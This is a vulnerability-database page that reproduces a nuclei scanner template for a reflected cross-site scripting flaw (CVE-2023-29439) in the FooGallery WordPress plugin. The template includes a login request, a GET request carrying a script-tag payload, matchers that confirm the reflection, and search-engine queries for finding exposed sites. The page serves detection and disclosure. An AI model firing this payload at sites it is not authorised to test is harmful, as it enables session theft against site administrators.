Lucene search
K

FooGallery plugin <= 2.2.35 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Reflected Cross-Site Scripting (XSS) vulnerability in FooGallery plugin <= 2.2.35 versions

Related
Refs
Code
id: CVE-2023-29439

info:
  name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
  impact: |
    Authenticated attackers can inject malicious JavaScript code through the post parameter, potentially stealing admin session tokens or performing unauthorized actions as administrators.
  remediation: |
    Upgrade to FooGallery version 2.2.36 or later.
  reference:
    - https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
    - https://wordpress.org/plugins/foogallery/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29439
    - https://patchstack.com/database/vulnerability/foogallery/wordpress-foogallery-plugin-2-2-35-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-29439
    cwe-id: CWE-79
    epss-score: 0.01747
    epss-percentile: 0.75069
    cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: fooplugins
    product: foogallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/foogallery/
    fofa-query: body=/wp-content/plugins/foogallery/
    publicwww-query: "/wp-content/plugins/foogallery/"
  tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'data-gallery_id="\"><script>alert(document.domain)</script>"'
          - 'foogallery-image-edit-modal'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f62d4aea2d34b254d7e02122c8fd1c2b09f6ea2b8e08f0ed297c0bc33d92eff802203e68702d98395afaad80d7485e6ede5fe2791c088e49b84229ec735766567e42:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1 - 7.1
EPSS0.01747
SSVC
30